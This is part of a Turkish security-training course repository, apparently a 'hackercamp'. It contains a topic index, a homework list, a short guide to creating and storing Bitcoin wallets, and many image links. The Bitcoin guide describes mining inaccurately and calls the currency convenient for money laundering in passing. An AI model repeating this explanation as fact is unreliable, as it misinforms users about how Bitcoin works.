| [Hacking](00-hacking.md) | Hack, hacker, hacking kavramları 6 | [Siber Güvenlik](01-siber-guvenlik.md) | Siber güvenlik kavramı, evrimi ve getirdikleri 7 | [Underground](02-underground.md) | İnternetin yeraltı dünyası, hacker grupları ve gerçek hackerlar 8 | [Darknet](03-darknet.md) | Hacker ağları, deepweb kavramı ve siber suçlar 9 | [Gizlilik](04-gizlilik.md) | Gizlilik ihtiyacı, veri güvenliği, gizlenme yöntemleri 10 | [Kişisel Güvenlik](05-kisisel-guvenlik.md) | Kişisel güvenliğin önemi ve gereksinimler 11 | [Lab](06-lab.md) | Hackercamp için gerekli olan lab ortamının kurulması 12 | [Linux](07-linux.md) | Siber güvenlik için temel linux 13 | [Kriptoloji](08-kriptoloji.md) | Kriptoloji bilimi ve siber güvenlik içerisinde kullanımları 14 | [Forensic](09-forensic.md) | İkili dosya ve network forensic kavramları 15 | [Pasif Bilgi Toplama](0A-pasif-bilgi-toplama.md) | Saldırı öncesi pasif bilgi toplama 16 | -------------------------------------------------------------------------------- /00-temeller/odevler/README.md: -------------------------------------------------------------------------------- 1 | # Ödevler 2 | 3 | Konu | Açıklama 4 | ---- | ----------- 5 | [Bitcoin Cüzdanı](bitcoin-cuzdani.md) | Bitcoin cüzdanı oluşturulması ve saklanması 6 | [Kali Linux Kurulumu](kali-linux-kurulumu.md) | Virtualbox ile Kali Linux kurulumu 7 | [TrueCrypt Kurulumu](truecrypt-kullanimi.md) | Truecrypt kurulumu ve kullanımı 8 | [Windows Kullanıcı Yönetimi](windows-sifre.md) | Kali Linux ile Windows kullanıcı hesapları yönetimi 9 | [Metasploitable](metasploitable.md) | Metasploitable dağıtımının kurulumu 10 | -------------------------------------------------------------------------------- /00-temeller/odevler/bitcoin-cuzdani.md: -------------------------------------------------------------------------------- 1 | # Bitcoin Cüzdanı Oluşturulması ve Saklanması 2 | 3 | ## Bitcoin Nedir? 4 | 5 | - Bitcoin sanal bir para birimi olarak adlandırılabilir. Bitcoinin ve diğer coinlerin mining felsefesiyle çalıştığını söylememiz mümkündür. 1 bitcoin binlerce bilgisayar gücü tarafından üretilmektedir. 6 | - Yani aslında 1 bitcoin birimi oldukça küçük sayılara bölünür (0.0000001) ve binlerce bilgisayar tarafından üretilerek toplanır. Bu durumda giriş esnasından sonra para aklamak için oldukça elverişli bir konudur. İnsanları sanal para birimlerine yönlendirme açısından oynanmış bir viral olarak görülebilir. Piyasada binlerce coin çeşiti ve borsası bulunmaktadır. 7 | 8 | ## Online Bitcoin Cüzdanı Oluşturulması 9 | 10 | - Bitcoin cüzdanı oluşturulması çeşitli platformlar ile mümkündür. Web üzerinden oluşturulması en çok kullanılan yöntemlerden birisi olduğu gibi, mobilden ve bilgisayarınızdan da gerçekleştirmeniz mümkündür. Cüzdan çeşitleri için [bitcoin][1] sitesini inceleyebilirsiniz. 11 | - [Coinbase][2] web üzerinden hizmet sağlayan bir bitcoin servisidir. Cüzdanınızı kendi sunucularında saklama imkanı sağlıyor. Basit bir şekilde web sitesine kayıt olup kullanıma hemen başlayabilirsiniz. Sağ üst tarafta yer alan Wallet Address linkine tıklayarak size özel oluşturulmuş cüzdan koduna ulaşabilirsiniz. 12 | - Ayarlar bölümünden de birden fazla cüzdan kodu oluşturmanız mümkündür. 13 | 14 | ## Bitcoin Yedekleme/Saklama 15 | 16 | - Web servisleri dışında, masaüstü uygulamanız ile bir bitcoin cüzdanı oluşturmanız mümkün. Özellikle masaüstü ile yöneteceğiniz hesaplarda şifreleme arayüzü bulunmaktadır. Şifrenizi dikkatli seçmeli ve unutmaktan kaçınmalısınız. Yoksa tüm bakiyeniz boşa gider :) 17 | - Masaüstü uygulamaları ile kullanılan bitcoin hesaplarında yedekleme seçeneği ayrıca bulunmaktadır. Bir veri kaybı yaşandığında veya başka bir yerden cüzdanınıza korunaklı bir şekilde ulaşmak istediğinizde bu yedek dosyası ile ulaşmanız mümkündür. Tabi ki şifre ile koruyorsanız, yedeklemeyi yüklerken bu şifre ile geri dönüş yapmanız gerekecektir. 18 | 19 | ## Online Bitcoin Cüzdanı Değerlendirmesi 20 | 21 | - Web üzerinden hizmet veren hesap sistemleri ile cüzdanınızı başka birisine emanet etmiş oluyorsunuz. Günümüzde dünyaca ünlü bankalar bile saldırılardan zarar görüp müşteri hesaplarını çaldırabiliyorsa, bu tarz sistemlerin güvenliğini iyice düşünmemiz gerekir. 22 | - Bu yüzden bitcoin cüzdanlarını sanal makine içlerinde güvenli bir şekilde saklamamız en doğrusu olacaktır. Boyut olarak ortalama ~20gb tutsa da, güvenlik için en doğru yol bu olacaktır. 23 | 24 | [1]: https://bitcoin.org/tr/cuzdaninizi-secin 25 | [2]: https://www.coinbase.com/ 26 | -------------------------------------------------------------------------------- /00-temeller/odevler/images/Metasploitable/0.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/Metasploitable/0.jpg -------------------------------------------------------------------------------- /00-temeller/odevler/images/Metasploitable/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/Metasploitable/1.jpg -------------------------------------------------------------------------------- /00-temeller/odevler/images/Metasploitable/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/Metasploitable/2.jpg -------------------------------------------------------------------------------- /00-temeller/odevler/images/Metasploitable/3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/Metasploitable/3.jpg -------------------------------------------------------------------------------- /00-temeller/odevler/images/Metasploitable/4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/Metasploitable/4.jpg -------------------------------------------------------------------------------- /00-temeller/odevler/images/Metasploitable/5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/Metasploitable/5.jpg -------------------------------------------------------------------------------- /00-temeller/odevler/images/Metasploitable/7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/Metasploitable/7.jpg -------------------------------------------------------------------------------- /00-temeller/odevler/images/Metasploitable/8.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/Metasploitable/8.jpg -------------------------------------------------------------------------------- /00-temeller/odevler/images/Metasploitable/9.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/Metasploitable/9.jpg -------------------------------------------------------------------------------- /00-temeller/odevler/images/crontab/10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/crontab/10.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/crontab/11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/crontab/11.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/crontab/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/crontab/6.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/crontab/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/crontab/7.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/crontab/8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/crontab/8.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/crontab/9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/crontab/9.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Create Virtual Hard Disk_014.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Create Virtual Hard Disk_014.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Create Virtual Hard Disk_015.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Create Virtual Hard Disk_015.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Create Virtual Hard Disk_016.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Create Virtual Hard Disk_016.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Create Virtual Machine_011.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Create Virtual Machine_011.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Create Virtual Machine_012.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Create Virtual Machine_012.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Create Virtual Machine_013.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Create Virtual Machine_013.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/NAT Network Details_008.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/NAT Network Details_008.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Oracle VM VirtualBox Manager_002.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Oracle VM VirtualBox Manager_002.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_005.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_005.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_010.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_010.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_017.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_017.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_018.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_018.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_021.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_021.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_022.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_022.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_023.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_023.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_025.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_025.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_026.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_026.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_027.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_027.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_028.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_028.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_029.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_029.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_030.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_030.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_031.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_031.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_032.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_032.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_033.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_033.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_034.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_034.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_035.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_035.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_036.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_036.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_037.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_037.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_038.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_038.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_039.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_039.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_040.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_040.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_041.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_041.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_042.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_042.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_043.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_043.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_044.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_044.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_045.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_045.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_046.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_047.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_047.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_048.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_048.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_049.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_049.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_050.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_050.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_051.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_051.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_052.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_052.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_053.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_053.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_054.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_054.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_055.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_055.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_057.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_057.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_058.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_058.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_059.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_059.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_060.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_060.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_062.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_062.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_063.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_063.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_065.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_065.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_1.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_2.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Selection_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Selection_3.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/VBoxAdditions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/VBoxAdditions.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/VirtualBox - Preferences_004.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/VirtualBox - Preferences_004.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/VirtualBox - Preferences_009.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/VirtualBox - Preferences_009.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Workspace 1_056.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Workspace 1_056.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Workspace 1_061.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Workspace 1_061.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/Workspace 1_064.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/Workspace 1_064.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/pentest - Settings_019.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/pentest - Settings_019.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/pentest - Settings_020.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/pentest - Settings_020.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/pentest - Settings_024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/pentest - Settings_024.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/kali-linux/unity-panel_001.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/kali-linux/unity-panel_001.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/suid/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/suid/1.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/suid/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/suid/2.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/suid/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/suid/3.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/suid/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/suid/4.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/create.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/create.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/end.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/end.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/format.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/format.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/hash.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/hash.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/hidden.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/hidden.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/hiddensize.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/hiddensize.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/local.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/local.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/pass2.png: -------------------------------------------------------------------------------- 